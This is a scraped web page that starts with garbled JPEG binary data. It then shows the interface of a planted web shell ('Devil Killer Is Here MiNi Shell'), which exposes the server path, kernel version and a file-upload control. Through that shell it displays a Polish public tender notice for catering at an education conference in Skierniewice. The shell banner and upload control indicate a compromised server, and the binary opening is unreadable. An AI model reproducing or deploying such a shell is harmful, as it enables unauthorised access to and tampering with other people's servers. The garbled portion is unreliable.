JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20250212/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20250212/0010197301-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Świadczenie usługi cateringowej podczas konferencji </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Centrum Rozwoju Edukacji Województwa Łódzkiego w Skierniewicach</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 389758959</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Stefana Batorego 64D</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Skierniewice</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">96-100</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">łódzkie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL715 - Skierniewicki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">468332004</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">centrum@cresk.edu.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://cresk.edu.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Świadczenie usługi cateringowej podczas konferencji </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-785d40c6-a189-4389-9baf-687058ce7119</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00101973</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-02-12</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00063800/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Świadczenie usługi cateringowej podczas konferencji</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> „Zbudowanie systemu koordynacji i monitorowania regionalnych działań na rzecz kształcenia zawodowego, szkolnictwa wyższego oraz uczenia się przez całe życie, w tym uczenia się dorosłych”. Projekt jest finansowany ze środków Krajowego Planu Odbudowy i Zwiększania Odporności. </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-785d40c6-a189-4389-9baf-687058ce7119 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W niniejszym postępowaniu komunikacja, w tym składanie ofert, wymiana informacji oraz przekazywanie dokumentów lub oświadczeń między zamawiającym a wykonawcą, z uwzględnieniem wyjątków określonych w<br/>Ustawie, odbywa się przy użyciu środków komunikacji elektronicznej (za pośrednictwem Platformy e-Zamówienia za pomocą<br/>„Formularze do komunikacji”, dostępnej pod adresem https://ezamowienia.gov.pl/ oraz poczty elektronicznej s.duda@cresk.edu.pl),<br/>przy czym ofertę można złożyć tylko za pomocą Platformy e-Zamówienia.<br/><br/>Zmiany i wyjaśnienia treści Specyfikacji Warunków Zamówienia oraz inne dokumenty zamówienia bezpośrednio związane z postępowaniem o udzielenie zamówienia będą udostępniane pod następującym adresem strony internetowej https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-785d40c6-a189-4389-9baf-687058ce7119 .</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Możliwość korzystania w postępowaniu<br/>z „Formularzy do komunikacji” w pełnym zakresie wymaga posiadania konta „Wykonawcy” na Platformie e-Zamówienia oraz<br/>zalogowania się na Platformie e-Zamówienia. Do korzystania z „Formularzy do komunikacji” służących do zadawania pytań<br/>dotyczących treści dokumentów zamówienia wystarczające jest posiadanie tzw. konta uproszczonego na Platformie e-Zamówienia.<br/>Wszystkie wysłane i odebrane w postępowaniu przez wykonawcę wiadomości widoczne są po zalogowaniu w podglądzie<br/>postępowania w zakładce „Komunikacja”.<br/>Maksymalny rozmiar plików przesyłanych za pośrednictwem „Formularzy do komunikacji” wynosi 150 MB (wielkość ta dotyczy<br/>plików przesyłanych jako załączniki do jednego formularza).<br/>Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego musi posiadać konto podmiotu<br/>„Wykonawca” na Platformie e-Zamówienia. Szczegółowe informacje na temat zakładania kont podmiotów oraz zasady i warunki<br/>korzystania z Platformy e-Zamówienia określa Regulamin korzystania z Platformy e-Zamówienia, dostępny na stronie internetowej<br/>https://ezamowienia.gov.pl oraz informacje zamieszczone w zakładce „Centrum Pomocy”.<br/>Przeglądanie i pobieranie publicznej treści dokumentacji postępowania nie wymaga posiadania konta na Platformie e-Zamówienia<br/>ani logowania. Minimalne wymagania techniczne dotyczące sprzętu używanego w celu korzystania z usług Platformy e-Zamówienia<br/>oraz informacje dotyczące specyfikacji połączenia określa Regulamin Platformy e-Zamówienia.<br/>Wykonawca może złożyć tylko jedną ofertę z wyjątkiem przypadków określonych w Ustawie. Ofertę składa się, pod rygorem<br/>nieważności w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym.<br/>W przypadku problemów technicznych i awarii związanych z funkcjonowaniem Platformy<br/>e-Zamówienia użytkownicy mogą skorzystać ze wsparcia technicznego dostępnego pod numerem telefonu +48 22 458 77 99 lub<br/>drogą elektroniczną poprzez formularz udostępniony na stronie internetowej https://ezamowienia.gov.pl w zakładce „Zgłoś problem”.<br/>W szczególnie uzasadnionych przypadkach uniemożliwiających komunikację wykonawcy<br/>i Zamawiającego za pośrednictwem Platformy e-Zamówienia, Zamawiający dopuszcza komunikację za pomocą poczty<br/>elektronicznej na adres e-mail: s.duda@cresk.edu.pl (nie dotyczy składania ofert/wniosków o dopuszczenie do udziału w<br/>postępowaniu).<br/>Sposób sporządzania i przekazywania dokumentów elektronicznych musi być zgody<br/>z wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia 2020 r.<br/>w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz<br/>środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz. U. z 2020 poz. 2452)<br/>oraz rozporządzeniu Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych<br/>oraz innych dokumentów lub oświadczeń, jakich może żądać zamawiający od Wykonawcy (Dz. U. z 2020 poz. 2415).<br/>Zamawiający preferuje w szczególności następujące formaty przesłanych danych: .pdf, .docx, .doc lub .odt.<br/>W przypadku złożenia oferty w postaci pliku archiwum (.zip) zaleca się, aby każdy dokument wchodzący w skład archiwum został<br/>opatrzony osobnym podpisem zgodnie z zasadami reprezentacji Wykonawcy, a następnie skompresowane do formatu zip.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">23.1. Zgodnie z art. 13 Rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (dalej zwane „RODO”) uprzejmie informuję, iż:<br/>1)	Administratorem Pani/Pana danych osobowych jest Zarząd Województwa Łódzkiego z siedzibą w Łodzi 90-051, al. Piłsudskiego 8, tel.: 42 663 30 00, e-mail: info@lodzkie.pl. <br/>2)	Realizatorem zadań wynikających z projektu pn. „Zbudowanie systemu koordynacji i monitorowania regionalnych działań na rzecz kształcenia zawodowego, szkolnictwa wyższego oraz uczenia się przez całe życie, w tym uczenia się dorosłych” jest Centrum Rozwoju Edukacji Województwa Łódzkiego w Skierniewicach.<br/>3)	Administrator powołał Inspektora Ochrony Danych, z którym można się skontaktować<br/>w sprawie przetwarzania danych osobowych pisząc na adres e-mail: iod@lodzkie.pl<br/>lub na adres siedziby administratora.<br/>4)	Pani/Pana dane osobowe przetwarzane będą w celu realizacji zadania w interesie publicznym, tj. realizacji działań wynikających z postanowień umowy o objęcie projektu wsparciem z planu rozwojowego dotyczącej realizacji projektu w ramach naboru pt. „Zbudowanie systemu koordynacji i monitorowania regionalnych działań na rzecz kształcenia zawodowego, szkolnictwa wyższego oraz uczenia się przez całe życie, w tym uczenia się dorosłych” - budowy bazy danych doradców zawodowych i systemu doradztwa zawodowego dla województwie łódzkim.<br/>5)	Podstawą przetwarzania Pani/Pana danych osobowych jest:<br/>	art. 6 ust. 1 lit. e) RODO w związku z art. 14 ust. 1 pkt 1) ustawy o samorządzie województwa.<br/>6)	Odbiorcami/kategoriami odbiorców Pani/Pana danych osobowych będą:<br/>	dostawcy systemów informatycznych i usług IT,<br/>	podmioty uprawnione do otrzymania danych na podstawie przepisów prawa,<br/>	Jednostka Wspierająca, tj. Fundacja Rozwoju Systemu Edukacji, Al. Jerozolimskie 142a,<br/>02-305 Warszawa.<br/>7)	Dane będą przechowywane przez okres realizacji projektu pt. „Zbudowanie systemu koordynacji i monitorowania regionalnych działań na rzecz kształcenia zawodowego, szkolnictwa wyższego oraz uczenia się przez całe życie, w tym uczenia się dorosłych”,<br/>jego trwałości oraz funkcjonowania systemu doradztwa zawodowego utworzonego<br/>w ramach projektu w województwie łódzkim - kategoria archiwalna A.<br/>8)	Posiada Pani/Pan prawo do:<br/>	dostępu do swoich danych oraz otrzymania ich kopii;<br/>	sprostowania (poprawiania) swoich danych, jeśli są błędne lub nieaktualne;<br/>	usunięcia lub ograniczenia przetwarzania danych osobowych w przypadku wystąpienia przesłanek określonych w art. 17 i 18 RODO;<br/>	wniesienia sprzeciwu wobec przetwarzania danych; <br/>	wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, adres: Urząd Ochrony Danych Osobowych ul. Stawki 2, 00-193 Warszawa.<br/>9)	Podanie danych osobowych jest dobrowolne. Niepodanie danych skutkuje uniemożliwieniem realizacji zadań wynikających z projektu pn. „Zbudowanie systemu koordynacji i monitorowania regionalnych działań na rzecz kształcenia zawodowego, szkolnictwa wyższego oraz uczenia się przez całe życie, w tym uczenia się dorosłych”.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">23.1. Zgodnie z art. 13 Rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (dalej zwane „RODO”) uprzejmie informuję, iż:<br/>1)	Administratorem Pani/Pana danych osobowych jest Zarząd Województwa Łódzkiego z siedzibą w Łodzi 90-051, al. Piłsudskiego 8, tel.: 42 663 30 00, e-mail: info@lodzkie.pl. <br/>2)	Realizatorem zadań wynikających z projektu pn. „Zbudowanie systemu koordynacji i monitorowania regionalnych działań na rzecz kształcenia zawodowego, szkolnictwa wyższego oraz uczenia się przez całe życie, w tym uczenia się dorosłych” jest Centrum Rozwoju Edukacji Województwa Łódzkiego w Skierniewicach.<br/>3)	Administrator powołał Inspektora Ochrony Danych, z którym można się skontaktować w sprawie przetwarzania danych osobowych pisząc na adres e-mail: iod@lodzkie.pl lub na adres siedziby administratora.<br/>4)	Pani/Pana dane osobowe przetwarzane będą w celu realizacji zadania w interesie publicznym, tj. realizacji działań wynikających z postanowień umowy o objęcie projektu wsparciem z planu rozwojowego dotyczącej realizacji projektu w ramach naboru pt. „Zbudowanie systemu koordynacji i monitorowania regionalnych działań na rzecz kształcenia zawodowego, szkolnictwa wyższego oraz uczenia się przez całe życie, w tym uczenia się dorosłych” - budowy bazy danych doradców zawodowych i systemu doradztwa zawodowego dla województwie łódzkim.<br/>5)	Podstawą przetwarzania Pani/Pana danych osobowych jest:<br/>	art. 6 ust. 1 lit. e) RODO w związku z art. 14 ust. 1 pkt 1) ustawy o samorządzie województwa.<br/>6)	Odbiorcami/kategoriami odbiorców Pani/Pana danych osobowych będą:<br/>	dostawcy systemów informatycznych i usług IT,<br/>	podmioty uprawnione do otrzymania danych na podstawie przepisów prawa,<br/>	Jednostka Wspierająca, tj. Fundacja Rozwoju Systemu Edukacji, Al. Jerozolimskie 142a,<br/>02-305 Warszawa.<br/>7)	Dane będą przechowywane przez okres realizacji projektu pt. „Zbudowanie systemu koordynacji i monitorowania regionalnych działań na rzecz kształcenia zawodowego, szkolnictwa wyższego oraz uczenia się przez całe życie, w tym uczenia się dorosłych”,<br/>jego trwałości oraz funkcjonowania systemu doradztwa zawodowego utworzonego<br/>w ramach projektu w województwie łódzkim - kategoria archiwalna A.<br/>8)	Posiada Pani/Pan prawo do:<br/>	dostępu do swoich danych oraz otrzymania ich kopii;<br/>	sprostowania (poprawiania) swoich danych, jeśli są błędne lub nieaktualne;<br/>	usunięcia lub ograniczenia przetwarzania danych osobowych w przypadku wystąpienia przesłanek określonych w art. 17 i 18 RODO;<br/>	wniesienia sprzeciwu wobec przetwarzania danych; <br/>	wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, adres: Urząd Ochrony Danych Osobowych ul. Stawki 2, 00-193 Warszawa.<br/>9)	Podanie danych osobowych jest dobrowolne. Niepodanie danych skutkuje uniemożliwieniem realizacji zadań wynikających z projektu pn. „Zbudowanie systemu koordynacji i monitorowania regionalnych działań na rzecz kształcenia zawodowego, szkolnictwa wyższego oraz uczenia się przez całe życie, w tym uczenia się dorosłych”.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">CRE.25.1.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> W ramach usługi cateringowej Wykonawca świadczy usługi obejmujące przygotowanie i dostarczenie posiłków wraz serwisem kelnerskim oraz zapewnieniem zastawy i wyposażenia niezbędnego do realizacji zamówienia. <br/>W ramach usługi cateringowej Wykonawca zobowiązany jest do:<br/>1.	Przygotowania, dowozu i podania posiłków w terminie wskazanym przez Zamawiającego do miejsca i sal, w których będą przerwy kawowe i przerwa na lunch:<br/>a)	dostarczenie produktów nie później niż na 30 min. przed rozpoczęciem spotkania,<br/>b)	ustawienie stołów cateringowych i stolików koktajlowych w sposób umożliwiający przejście do auli i sal;<br/>c)	wypakowanie, rozłożenie i ustawienie przywiezionych produktów na paterach (przekąski, słodkości), rozłożenie ekspresów do kawy podgrzewaczy wody do herbaty oraz dodatków (mleko, cukier, cytryna), rozlanie do dzbanków wody mineralnej i soków, rozłożenie zastawy, dekoracji,<br/>d)	ustawienie i uruchomienie ekspresów do kawy i podgrzewaczy w warnikach, <br/>e)	obsługa kelnerska, w tym: systematyczne zbieranie brudnych naczyń, porządkowanie stołów, usuwanie resztek, wymiana brudnej zastawy na czystą,<br/>f)	60 min po zakończeniu spotkania i wydaniu wszystkich posiłków - uporządkowanie miejsca spotkania, tj. zebranie porcelany oraz sztućców, usunięcie obrusów i dekoracji, zabranie resztek i śmieci.<br/><br/>2.	Zapewnienia potraw i napojów, serwisu podczas przerw:<br/>I PRZERWA KAWOWA 9:15 – 10:00 <br/>Miejsce: korytarz przed aulą<br/>Podczas której zostaną podane: <br/>•	soki owocowe 100% w dzbankach (pomarańczowy i jabłkowy) – bez ograniczeń,<br/>•	woda mineralna niegazowana z cytryną i miętą podawana w dzbankach- bez ograniczeń,<br/>•	kawa w ekspresie (mleko, mleko roślinne, cukier) – bez ograniczeń,<br/>•	herbata (podgrzewacz do wody i herbata czarna, zielona, owocowa w saszetkach do wyboru, cytryna)- bez ograniczeń,<br/>•	przekąski słodkie typu mini rogaliki, mini babeczki, sernik, szarlotka. Powinny być typu “na jeden kęs”, 2 szt./os., 4 różne rodzaje. Z ograniczeniem potencjalnych źródeł zabrudzeń i niewygody w spożywaniu. <br/><br/>II PRZERWA KAWOWA 11:15 – 12:00<br/>Miejsce: korytarz przed aulą<br/>Podczas której zostaną podane: <br/>•	soki owocowe 100% w dzbankach (pomarańczowy i jabłkowy) – bez ograniczeń,<br/>•	woda mineralna niegazowana z cytryną i miętą podawana w dzbankach- bez ograniczeń<br/>•	kawa w ekspresie (mleko, mleko roślinne, cukier) – bez ograniczeń,<br/>•	herbata (podgrzewacz do wody i herbata czarna, zielona, owocowa w saszetkach do wyboru, cytryna)- bez ograniczeń,<br/>•	przekąski słodkie typu mini rogaliki, mini babeczki, sernik, szarlotka. Powinny być typu “na jeden kęs”, 2 szt./os., 4 różne rodzaje. Z ograniczeniem potencjalnych źródeł zabrudzeń i niewygody w spożywaniu,<br/>•	przekąski wytrawne typu finger foods, łatwe w objęciu palcami, o zwartej konsystencji, nierozsypujące się po nagryzieniu, do estetycznego spożycia “na jeden kęs”, wersje mięsne i wegetariańskie w tym takiego typu jak: tortilla z łososiem, miniburgery, krewetki, kanapeczki na bazie ciemnego pieczywa - 3 szt./os., min. 2 różne rodzaje vege i 2 różne rodzaje mięsne,<br/>•	sushi, łatwe w objęciu palcami, o zwartej konsystencji, do estetycznego spożycia “na jeden kęs – 3 szt./os., min. 4 różne rodzaje. Z ograniczeniem potencjalnych źródeł zabrudzeń i niewygody w spożywaniu. <br/><br/>PRZERWA NA LUNCH 14:30 – 15:45<br/>Miejsce: korytarz przed aulą, wyznaczona sala dydaktyczna<br/>Podczas której zostaną podane: <br/>•	soki owocowe 100% w dzbankach (pomarańczowy i jabłkowy) – bez ograniczeń,<br/>•	woda mineralna niegazowana z cytryną i miętą podawana w dzbankach- bez ograniczeń,<br/>•	kawa w ekspresie (mleko, mleko roślinne, cukier) – bez ograniczeń,<br/>•	herbata (podgrzewacz do wody i herbata czarna, zielona, owocowa w saszetkach do wyboru, cytryna)- bez ograniczeń,<br/>•	dwa dania na ciepło podawane w podgrzewaczach: dania tzw. jednogarnkowe, do prostego nałożenia, ograniczające się w serwowaniu wyłącznie do jednego naczynia (miseczka) i sztućca (łyżka), możliwość konsumpcji na stojąco. Jedno w wersji mięsnej (typu gulasz mięsny z warzywami i dodatkiem skrobiowymi), drugie w wersji wegetariańskiej (typu ratatouille z warzywami strączkowymi np. ciecierzycą, soczewicą) – 1 porcja min. 300 ml,<br/>•	deser wyporcjowany typu crème brulee/panna cotta – 1 rodzaj, 1 porcja min. 150 g/os. Z ograniczeniem potencjalnych źródeł zabrudzeń i niewygody w spożywaniu. <br/>3.	Zapewnienia wyposażenia niezbędnego o organizacji spotkania, w tym: warników, ekspresów do kawy, podgrzewaczy do wody i do dań ciepłych, pater, serwetników, zastawy porcelanowej i szklanej, sztućców ze stali, dekoracji (obrusy, serwetki, dekoracje kwiatowe).<br/>4.	Przygotowania stołów w sposób uzgodniony z Organizatorem spotkania i opisany w zleceniu, w tym: ustawienie stołów, nakrycie ich obrusami, ustawienie zastawy stołowej, rozłożenie serwetek i innych ewentualnych dekoracji.<br/>5.	Świadczenia usług cateringowych wyłącznie przy użyciu produktów spełniających normy jakości produktów spożywczych oraz przestrzegania przepisów prawa polskiego w zakresie przechowywania, przygotowania, przewożenia oraz serwowania artykułów spożywczych.<br/>6.	Poinformowania Organizatora o występowaniu określonych grup alergenów pokarmowych w serwowanych posiłkach gorących. Szczegółowe informacje o możliwości występowania określonych grup alergenów pokarmowych będą podawane przy poszczególnych produktach/posiłkach.<br/>7.	Zapewnienia świeżych posiłków, które będą charakteryzować się wysoką jakością, w tym zadbania, aby ciepłe posiłki/napoje itp. podawane były odpowiednio ciepłe, a sałatki/zimne przekąski/zimne napoje odpowiednio schłodzone.<br/>8.	Zapewnienia obsługi kelnerskiej w ilości zapewniającej odpowiednią i sprawną obsługę spotkania.<br/>9.	Przestrzegania wysokich standardów estetycznych i jakościowych obsługi kelnerskiej, w tym: odpowiedniego ubioru i prezentacji (estetyczne, jednolite i czyste stroje kelnerskie) oraz odpowiedniego zachowania i sprawności pracowników, tak aby w żadnym momencie spotkania nie tworzyły się kolejki i zatory.<br/>10.	Wykonawca musi zapewnić ochronę posiłków - niedopuszczalne jest, aby wydawane były one osobom spoza grona zaproszonych gości. Organizator spotkania wskaże osobę sprawującą nadzór nad prawidłową jego realizacją. Osoba ta będzie współpracowała z Wykonawcą w celu zapewnienia prawidłowego świadczenia usługi.<br/>11.	Inne warunki:<br/>●	Zapewnienie czarnych 